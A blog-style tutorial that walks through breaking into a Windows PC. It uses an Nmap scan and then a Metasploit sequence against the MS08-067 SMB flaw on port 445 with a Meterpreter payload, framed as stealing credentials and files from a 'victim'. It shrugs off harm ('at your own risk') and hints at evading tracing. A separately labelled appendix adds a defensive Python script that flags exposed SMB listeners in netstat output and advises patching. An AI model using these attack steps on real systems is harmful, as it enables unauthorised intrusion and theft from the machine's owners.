Hack a computer using Metasploit
Hello everyone! I am here again with a new post, and this time it is about how to hack a computer using Metasploit. So what exactly is Metasploit? The Metasploit Framework is an open source penetration testing tool used for developing and executing exploit code against a remote target machine. The Metasploit Framework has the world’s largest database of public, tested exploits. In simple words, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and on the other hand it can also be used to break into remote systems.
Here I will give a general description of how it works and how to use it efficiently to hack into a PC and steal credentials.
So here it goes….
1. Metasploit (Available at metasploit.org)
2. Nmap (Port scanner available at nmap.org)
3. Debian Linux OS
4. IP of the victim’s computer.
Introduction to attack:
Nmap is a port scanner used to scan a computer to locate the open ports. The ports are the path for the information that we need to steal. A normal computer usually keeps 30-40 ports open. To find the number of ports open on your computer, open the command prompt (Start > Command prompt), type netstat -ano and hit Enter; you will get a list of the open ports on your computer. You need a basic knowledge of ports and port numbers to perform this attack.
Using a tool such as Metasploit we can spoof into the PC and steal the information from the corresponding port using commands. Learn to use Metasploit at http://www.metasploit.com/learn-more/how-do-i-use-it/.
Step 1: At first we are going to port scan the computer. For this we need to open Nmap and type the following command: nmap -sS -O <ip>
In place of <ip> you have to write the victim’s IP address. If you see ports 139 and 445 open then you can go ahead.
Step 2: Now we have to open Metasploit (via terminal) and run it. Type the following command to get the exploits in the victim’s computer: show exploits
You will get a list of exploits in the victim’s computer, with names that look similar to “ms05_039_pnp”. Each such exploit corresponds to a different function. We are interested in an exploit which looks like this: “ms08_067_netapi”. So we give the command as shown: use windows/smb/ms08_067_netapi
Step 3: Now we use the RHOST command to set the target IP: set RHOST
Step 4: And the RPORT command to access port 445: set RPORT 445
Step 5: And now we give the command: set SMBPIPE SRVSVC
Step 6: And then: set TARGET 0
Step 7: Now we have to set the payload, hence the following command: set PAYLOAD windows/meterpreter/bind_tcp
Step 8: Time for the BIG BANG…! Type “exploit” (without quotes) and hit Enter.
If you find a message which looks close to “Meterpreter session 1 opened” then congratulations my friend, it’s done! You have successfully hacked the computer. By using different commands we can steal the files on that system.
All this is for educational purposes only. Harm the victim’s computer at your own risk.
NOTE: The hacker can be traced, and hence additional techniques are required to make yourself safe!
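The netstat -ano check from the introduction, turned into an audit of your own machine for the condition Step 1 looks for (listeners on ports 139 and 445 reachable from the network). This is an added example, not part of the original post; the function names are hypothetical and the sample netstat output is constructed.

```python
# Ports the walkthrough checks for in Step 1 (NetBIOS session service, SMB).
SMB_PORTS = {139, 445}
LOOPBACK = {"127.0.0.1", "::1"}

# Constructed sample of Windows `netstat -ano` output (not from a real host).
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:5939         0.0.0.0:0              LISTENING       2480
  TCP    192.168.1.20:139       0.0.0.0:0              LISTENING       4
  TCP    192.168.1.20:49712     203.0.113.7:443        ESTABLISHED     6120
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:5353           *:*                                    1820
"""

def split_endpoint(endpoint):
    """Split 'addr:port' or '[v6addr]:port' into (addr, port)."""
    addr, _, port = endpoint.rpartition(":")
    return addr.strip("[]"), int(port)

def parse_listeners(netstat_text):
    """Yield (address, port, pid) for every TCP socket in LISTENING state."""
    for line in netstat_text.splitlines():
        fields = line.split()
        # TCP rows have 5 columns; UDP rows lack the State column and the
        # banner/header rows have other widths, so all of those are skipped.
        if len(fields) == 5 and fields[0] == "TCP" and fields[3] == "LISTENING":
            addr, port = split_endpoint(fields[1])
            yield addr, port, int(fields[4])

def exposed_smb(netstat_text):
    """Return SMB/NetBIOS listeners bound to a non-loopback address."""
    return sorted(
        (addr, port, pid)
        for addr, port, pid in parse_listeners(netstat_text)
        if port in SMB_PORTS and addr not in LOOPBACK
    )

if __name__ == "__main__":
    for addr, port, pid in exposed_smb(SAMPLE):
        print(f"exposed: {addr}:{port} (PID {pid})")
```

Any listener it reports on a machine that does not need file sharing is a candidate for a host-firewall block or for disabling the service. The module named in Step 2 corresponds to Microsoft security bulletin MS08-067, so the matching patch should be installed as well.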